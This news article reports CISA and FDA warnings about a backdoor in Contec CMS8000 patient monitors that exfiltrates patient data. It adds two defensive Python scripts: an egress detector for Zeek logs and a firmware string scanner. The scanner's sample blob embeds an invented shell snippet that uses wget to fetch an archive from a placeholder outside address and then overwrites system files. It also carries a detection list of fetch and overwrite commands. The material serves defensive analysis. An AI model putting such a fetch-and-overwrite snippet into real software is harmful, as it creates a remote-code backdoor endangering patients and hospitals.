Federal agencies are warning hospitals of a backdoor discovered in a
popular line of patient monitors sold by Chinese company Contec.
The Cybersecurity and Infrastructure Security Agency (CISA) and Food
and Drug Administration (FDA) released warnings on Thursday about an
embedded function they found in the firmware of the Contec CMS8000 —
hardware used to display information like vital signs, temperature,
heartbeat and blood pressure.
Contec Medical is a medical device company based in Hebei, China. The
affected patient monitors are “used in medical settings in the U.S. and
European Union,” CISA [1]said.
The backdoor “may allow remote code execution and device modification
with the ability to alter its configuration, introducing risk to
patient safety as a malfunctioning patient monitor could lead to an
improper response to patient vital signs.”
CISA noted that the Contec CMS8000 may be re-labeled and sold by
resellers; the FDA said the Epsimed MN-120 patient monitor is one such
relabeled Contec CMS8000.
The FDA [2]said in a statement that the monitors “may be remotely
controlled by an unauthorized user or not work as intended.” CISA
[3]tagged the vulnerabilities as CVE-2024-12248, CVE-2025-0626 and
CVE-2025-0683.
The FDA said it has not seen any cybersecurity incidents, injuries or
deaths related to the vulnerabilities, but warned that the bugs would
allow hackers to bypass security controls and manipulate devices.
Contec did not respond to requests for comment. There is no software
patch for the issues discovered by the two agencies.
“The FDA and CISA continue to work with Contec to correct these
vulnerabilities as soon as possible,” the FDA said.
Internet activity
The software on the monitors “includes a backdoor, which may mean that
the device or the network to which the device has been connected may
have been or could be compromised,” the FDA said.
“Once the patient monitor is connected to the internet, it begins
gathering patient data, including personally identifiable information
(PII) and protected health information (PHI), and exfiltrating
(withdrawing) the data outside of the health care delivery
environment.”
CISA said the IP address connected to the backdoor is “not associated
with a medical device manufacturer or medical facility but a
third-party university.”
The agency did not name the university or its location. CISA and the
FDA did not respond to requests for comment about the university.
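The behaviour the FDA describes above, a monitor that opens connections of its own to an address outside the clinical network, is visible at the network edge even though the firmware cannot be patched. The script below is an added example, not CISA or FDA tooling and not code from the device: it reads Zeek conn.log-style records and reports every connection a host on the monitor VLAN originated to a peer that is neither allowlisted nor on the organisation's private ranges. Direction is the point: a central station polling a monitor is normal; the monitor dialling out is not. The monitor subnet 10.40.0.0/24, the allowlisted peers, the ports and the log lines are all constructed for the illustration, and the outside address is from the RFC 5737 documentation range, not the one CISA found.

```python
"""Spot patient monitors dialling out of the clinical network.

Added example, not CISA/FDA tooling. Reads Zeek conn.log-style tab-separated
records (standard field order, no header) and groups monitor-originated
connections to unexpected peers by (device, peer), reporting bytes sent
(exfiltration signal) and bytes received (files pulled down signal).
Subnet, allowlist and sample lines are constructed.
"""
import ipaddress
from collections import defaultdict

# Assumption: the VLAN the patient monitors sit on.
MONITOR_NET = ipaddress.ip_network("10.40.0.0/24")
# Assumption: the only peers a monitor legitimately contacts on its own
# initiative (central monitoring station, NTP server).
ALLOWED_PEERS = {ipaddress.ip_address("10.40.0.5"), ipaddress.ip_address("10.1.1.10")}
# RFC 1918 space; anything outside it is "off the clinical network".
# ipaddress.is_global is avoided on purpose: it treats the documentation
# range 203.0.113.0/24 used in the sample as non-global.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed conn.log excerpt. Field order:
# ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state
SAMPLE_CONN_LOG = """\
1738252800.1\tCa1\t10.40.0.21\t51234\t10.40.0.5\t9000\ttcp\t-\t120.0\t48210\t312\tSF
1738252801.2\tCa2\t10.40.0.21\t123\t10.1.1.10\t123\tudp\tntp\t0.01\t48\t48\tSF
1738252803.3\tCb1\t10.40.0.22\t44521\t203.0.113.7\t9000\ttcp\t-\t1.5\t0\t0\tS0
1738252805.4\tCb2\t10.40.0.22\t44522\t203.0.113.7\t9000\ttcp\t-\t12.0\t22000\t4096\tSF
1738252806.5\tCb3\t10.40.0.22\t44523\t203.0.113.7\t80\ttcp\thttp\t3.0\t400\t900000\tSF
1738252807.6\tCc1\t10.1.1.10\t40000\t10.40.0.21\t22\ttcp\tssh\t30.0\t1000\t2000\tSF
1738252808.7\tCd1\t10.40.0.23\t50001\t10.20.5.9\t445\ttcp\t-\t2.0\t300\t600\tSF
"""


def parse_conn_log(text):
    """Parse tab-separated conn.log lines into dicts; '-' byte counts become 0."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split("\t")
        if len(f) < 12:
            continue  # truncated line: skip it rather than abort the triage
        records.append({
            "uid": f[1],
            "orig": ipaddress.ip_address(f[2]), "orig_p": int(f[3]),
            "resp": ipaddress.ip_address(f[4]), "resp_p": int(f[5]),
            "proto": f[6],
            "orig_bytes": int(f[9]) if f[9] != "-" else 0,
            "resp_bytes": int(f[10]) if f[10] != "-" else 0,
        })
    return records


def is_private(addr):
    return any(addr in net for net in PRIVATE_NETS)


def find_device_egress(records, monitor_net=MONITOR_NET, allowed=ALLOWED_PEERS):
    """Group monitor-originated connections to unexpected peers by (device, peer).

    Severity is 'high' when the peer is outside private address space, else
    'medium' (an unexpected internal host is still worth a look).
    """
    groups = defaultdict(lambda: {"conns": 0, "sent": 0, "received": 0, "ports": set()})
    for r in records:
        if r["orig"] not in monitor_net:
            continue  # the monitor did not originate this connection
        if r["resp"] in allowed or r["resp"] in monitor_net:
            continue  # expected peer
        g = groups[(r["orig"], r["resp"])]
        g["conns"] += 1
        g["sent"] += r["orig_bytes"]
        g["received"] += r["resp_bytes"]
        g["ports"].add(r["resp_p"])
    findings = []
    for (device, peer), g in sorted(groups.items(), key=lambda kv: (int(kv[0][0]), int(kv[0][1]))):
        findings.append({
            "device": str(device), "peer": str(peer),
            "severity": "medium" if is_private(peer) else "high",
            "conns": g["conns"], "sent": g["sent"], "received": g["received"],
            "ports": sorted(g["ports"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_device_egress(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"[{f['severity']}] {f['device']} -> {f['peer']} ports={f['ports']} "
              f"conns={f['conns']} sent={f['sent']}B received={f['received']}B")
```

Zeek writes these fields in this order to conn.log, so feeding the real file through parse_conn_log and setting MONITOR_NET and ALLOWED_PEERS for the site is all that changes. The received-byte column deserves as much attention as the sent one: CISA describes files being pulled down and overwritten on the device, which shows up as a monitor receiving far more than it transmits.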
Patients and healthcare providers should ask healthcare facilities if
their devices have remote monitoring features, which allow hospital
staff to view a patient's vital signs from another location, the
agencies said.
If it is confirmed that a device allows remote monitoring, “unplug the
device and stop using it,” the FDA warned. Patients should ask for an
alternative patient monitor.
The agency urged hospital staff who rely only on local monitoring
features to unplug the device’s ethernet cable and disable its wireless
capabilities.
“The FDA has authorized these patient monitors only for wired
functionality (that is, ethernet connectivity). However, the FDA is
aware that some patient monitors may be available with wireless (that
is, WiFi or cellular) capabilities without FDA authorization,” the
agency noted.
Disclosed by a researcher
In a longer [4]technical report about the issues, CISA said an external
researcher notified the agency of the issues through its Coordinated
Vulnerability Disclosure Process. CISA then tested the findings and
“discovered what resembles a reverse backdoor within all three of the
firmware packages.”
Some vendors build remote functionality of this kind into their
products to deliver updates, but CISA said that is unlikely to be the
purpose here. The agency found that the function exhibited “highly
unusual characteristics that do not support the implementation of a
traditional update feature.”
“When the function is executed, files on the device are forcibly
overwritten, preventing the end customer — such as a hospital — from
maintaining awareness of what software is running on the device,” CISA
said.
“These types of actions and the lack of critical log/auditing data go
against generally accepted practices and ignore essential components
for properly managed system updates, especially for medical devices.”
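What CISA describes, a hard-coded address plus logic that pulls files down and overwrites what is on the device, is exactly what an analyst looks for in an unpacked firmware image before any dynamic testing. The script below is an added example, not CISA's analysis and not Contec code: it extracts printable strings from an image, finds IPv4 literals, classifies each as RFC 1918 private or public, and raises the severity when the same string also carries commands that fetch files or write over the filesystem. FIRMWARE_BLOB is a constructed stand-in for an unpacked image; the public address in it is from the RFC 5737 documentation range, not the one CISA reported, and the embedded shell script is invented for the illustration.

```python
"""Static triage of a firmware image for hard-coded endpoints and overwrite logic.

Added example, not CISA's analysis or Contec code. Pulls printable strings out
of an image, finds IPv4 literals in them, classifies each as RFC 1918 private
or public, and raises severity when the same string also contains commands
that fetch files or overwrite the filesystem. FIRMWARE_BLOB is a constructed
stand-in; its public address is from the documentation range (RFC 5737).
"""
import ipaddress
import re

MIN_STR_LEN = 6
# Four dotted octets not embedded in a longer dotted run, so 1.0.3 or
# 10.1.1.10.5 are not taken as addresses.
IPV4_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Commands that pull files in or write over the filesystem. Seen in the same
# string as a hard-coded address, they turn a plain beacon into an
# update-and-overwrite candidate.
FETCH_OVERWRITE_TOKENS = (b"wget", b"curl", b"tftp", b"ftpget", b"mount", b"cp -f", b"tar x", b"dd if=")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed stand-in for an unpacked image: header bytes, version strings,
# an invented embedded shell script, a config fragment, a decoy and padding.
FIRMWARE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"Vital signs monitor v2.1\x00"
    + b"Version string: 1.0.3\x00"
    + b"#!/bin/sh\nUPD=203.0.113.7\n"
    + b"wget -q http://$UPD/update.tar -O /tmp/u.tar\n"
    + b"tar xf /tmp/u.tar -C /\n"
    + b"cp -f /tmp/monitor /usr/bin/monitor\n\x00"
    + b"\x00\x00ntp 10.1.1.10\x00"
    + b"build 300.1.1.1 cache\x00"
    + b"\xff\xfe" * 8
)


def extract_strings(blob, min_len=MIN_STR_LEN):
    """Return (offset, bytes) for each run of printable ASCII (tab/newline allowed) of at least min_len."""
    runs, start = [], None
    for i, b in enumerate(blob):
        printable = 0x20 <= b < 0x7F or b in (0x09, 0x0A)
        if printable and start is None:
            start = i
        elif not printable and start is not None:
            if i - start >= min_len:
                runs.append((start, blob[start:i]))
            start = None
    if start is not None and len(blob) - start >= min_len:
        runs.append((start, blob[start:]))
    return runs


def is_rfc1918(addr):
    return any(addr in net for net in RFC1918)


def find_hardcoded_endpoints(blob):
    """List IPv4 literals with offset, scope, co-located fetch/overwrite tokens and severity."""
    findings = []
    for off, s in extract_strings(blob):
        for m in IPV4_RE.finditer(s):
            try:
                addr = ipaddress.ip_address(m.group().decode())
            except ValueError:
                continue  # e.g. 300.1.1.1: has the shape of an address, is not one
            tokens = [t.decode() for t in FETCH_OVERWRITE_TOKENS if t in s]
            public = not is_rfc1918(addr)
            severity = "high" if public and tokens else "medium" if public or tokens else "low"
            findings.append({
                "offset": off + m.start(),
                "address": str(addr),
                "scope": "public" if public else "private",
                "tokens": tokens,
                "severity": severity,
                "context": s[max(0, m.start() - 20): m.end() + 40].decode(errors="replace"),
            })
    return sorted(findings, key=lambda f: f["offset"])


if __name__ == "__main__":
    for f in find_hardcoded_endpoints(FIRMWARE_BLOB):
        print(f"[{f['severity']}] 0x{f['offset']:06x} {f['address']} ({f['scope']}) tokens={f['tokens']}")
        print("    " + f["context"].replace("\n", "\\n"))
```

To run it on a real image, replace FIRMWARE_BLOB with open(path, "rb").read() after unpacking the filesystem. A public address whose string also carries fetch or overwrite commands is the case to trace in a disassembler or by watching the device on an isolated network; a private-range address next to ntp or syslog is usually benign. String-based triage only catches literals stored in the clear, so a clean result does not rule out an address that is assembled at runtime or stored obfuscated.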
[6]Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has
worked across the globe as a journalist since 2014. Before moving back
to New York City, he worked for news outlets in South Africa, Jordan
and Cambodia. He previously covered cybersecurity at ZDNet and
TechRepublic.
References
1. https://www.cisa.gov/resources-tools/resources/contec-cms8000-contains-backdoor
2. https://www.fda.gov/medical-devices/safety-communications/cybersecurity-vulnerabilities-certain-patient-monitors-contec-and-epsimed-fda-safety-communication
3. https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-030-01
4. https://www.cisa.gov/sites/default/files/2025-01/fact-sheet-contec-cms8000-contains-a-backdoor-508c.pdf
6. https://therecord.media/author/jonathan-greig